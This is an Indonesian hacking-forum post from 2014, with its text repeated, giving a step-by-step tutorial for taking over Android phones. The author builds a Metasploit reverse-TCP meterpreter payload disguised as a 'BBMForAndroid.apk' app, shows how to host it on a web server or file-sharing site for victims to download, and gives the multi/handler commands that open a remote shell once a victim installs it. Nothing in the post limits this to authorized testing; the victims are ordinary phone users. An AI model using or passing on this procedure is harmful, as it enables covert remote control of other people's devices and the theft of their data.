01-14-2014, 04:41 PM
Selamat siang rekan-rekan sekalian 
kali ini saya akan share bagaimana cara mengexploit handphone, tablet atau apapun yang menggunakan Android. sebelumnya saya minta maaf karena postingan saya kali ini hanya menyempurnakan thread dari om @larcenciels
kali ini saya akan mengshare bagaimana kita bisa mengexploit android dengan ip publik.
ok pertama yang kita butuhkan ada MSFCONSOLE dan tentunya kita terhubung dengan ip publik. bisa menggunakan wifi, jaringan speedy, atau jaringan lainnya.
tapi kali ini saya akan langsung mengexploit menggunakan komputer server. karena saya tidak punya ip publik. maklum anak kost pakenya gratisan =))
kita bisa menggunakan VPS dengan syarat dalam VPS tersebut sudah terinstal METASPLOIT. bagaimana cara instal msfconsole di komputer server?
saya sebelumnya sudah membuat thread tentang bagaimana cara menginstal metasploit di komputer server
ok langsung saja, pertama saya akan mengkoneksikan pc saya ke pc server melalui ssh. saya langsung di terminal, kalau pakai windows, bisa pakai putty, bitvise atau apapun :-bd
![[Image: 1520725_717328968277407_923363840_n.jpg]](https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn2/1520725_717328968277407_923363840_n.jpg)
wkwkwkk konekin sshnya aja harus pake proxychains =))
ok, langsung saja, bagi yang punya ip publik langsung dari pc masing" saja sudah bisa
langsung buat payloadnya dengan cara
![[Image: 1525630_717329004944070_1811949333_n.jpg]](https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash3/t1/q71/s720x720/1525630_717329004944070_1811949333_n.jpg)
setelah jadi, pindahkan atau copy file tersebut ke directory /var/www agar bisa di download langsung oleh korban. atau bisa di upload ke mediafire atau semacamnya
![[Image: 1016615_717329011610736_1926500536_n.jpg]](https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-ash3/q71/s720x720/1016615_717329011610736_1926500536_n.jpg)
setelah itu, kita bisa membuka msfconsole kita
dan pastikan bahwa msfconsole kita sudah update yang terbaru karena yang lama belum ada modul android meterpreter.
![[Image: 1512564_717329674944003_2128045508_n.jpg]](https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn1/q71/s720x720/1512564_717329674944003_2128045508_n.jpg)
lalu kita bisa mengeksekusinya dengan:
![[Image: 1531629_717329388277365_734355370_n.jpg]](https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-prn1/q71/s720x720/1531629_717329388277365_734355370_n.jpg)
kita tinggal menunggu korban membuka file yang kita buat tadi. setelah dia membuka file yang kita buat tadi maka akan muncul penampakan seperti ini
![[Image: 1512504_717329518277352_1015988583_n.jpg]](https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-prn1/q71/s720x720/1512504_717329518277352_1015988583_n.jpg)
taraaa kita masuk ke meterpreter =))
tinggal sesuka hati saja kita mau apakan android tersebut \m/
![[Image: 1517456_717329604944010_1693111940_n.jpg]](https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1517456_717329604944010_1693111940_n.jpg)
sekian dari saya, apabila kurang berkenan saya mohon maaf
semoga bermanfaat \m/
kali ini saya akan share bagaimana cara mengexploit handphone, tablet atau apapun yang menggunakan Android. sebelumnya saya minta maaf karena postingan saya kali ini hanya menyempurnakan thread dari om @larcenciels
Quote:http://indonesianbacktrack.or.id/forum/thread-5101.htmldi thread om @larcenciels di jelaskan hanya untuk satu jaringan saja dan ss juga tidak terlihat
kali ini saya akan mengshare bagaimana kita bisa mengexploit android dengan ip publik.
ok pertama yang kita butuhkan ada MSFCONSOLE dan tentunya kita terhubung dengan ip publik. bisa menggunakan wifi, jaringan speedy, atau jaringan lainnya.
tapi kali ini saya akan langsung mengexploit menggunakan komputer server. karena saya tidak punya ip publik. maklum anak kost pakenya gratisan =))
kita bisa menggunakan VPS dengan syarat dalam VPS tersebut sudah terinstal METASPLOIT. bagaimana cara instal msfconsole di komputer server?
saya sebelumnya sudah membuat thread tentang bagaimana cara menginstal metasploit di komputer server
Quote:http://indonesianbacktrack.or.id/forum/thread-5522.html
ok langsung saja, pertama saya akan mengkoneksikan pc saya ke pc server melalui ssh. saya langsung di terminal, kalau pakai windows, bisa pakai putty, bitvise atau apapun :-bd
wkwkwkk konekin sshnya aja harus pake proxychains =))
ok, langsung saja, bagi yang punya ip publik langsung dari pc masing" saja sudah bisa
langsung buat payloadnya dengan cara
Code:
msfpayload android/meterpreter/reverse_tcp LHOST=ip publik LPORT=123 R > BBMForAndroid.apkQuote:LHOST= di isi dengan ip publik anda sendiri
nama aplikasi bisa di ganti sesuai keinginan anda masing-masing, dan gunakan ekstensi .apk agar bisa di eksekusi oleh android
setelah jadi, pindahkan atau copy file tersebut ke directory /var/www agar bisa di download langsung oleh korban. atau bisa di upload ke mediafire atau semacamnya
Quote:korban bisa mendownload file payload yang kita buat tadi dengan mengakses link ipPublic/namaAplikasi.apk. contoh punya saya 103.23.xxx.xx/BBMForAndroid.apk
setelah itu, kita bisa membuka msfconsole kita
dan pastikan bahwa msfconsole kita sudah update yang terbaru karena yang lama belum ada modul android meterpreter.
lalu kita bisa mengeksekusinya dengan:
Code:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost ip publik
set lport 123
exploitkita tinggal menunggu korban membuka file yang kita buat tadi. setelah dia membuka file yang kita buat tadi maka akan muncul penampakan seperti ini
taraaa kita masuk ke meterpreter =))
tinggal sesuka hati saja kita mau apakan android tersebut \m/
sekian dari saya, apabila kurang berkenan saya mohon maaf
semoga bermanfaat \m/
Information Is The Most Dangerous Weapon In The World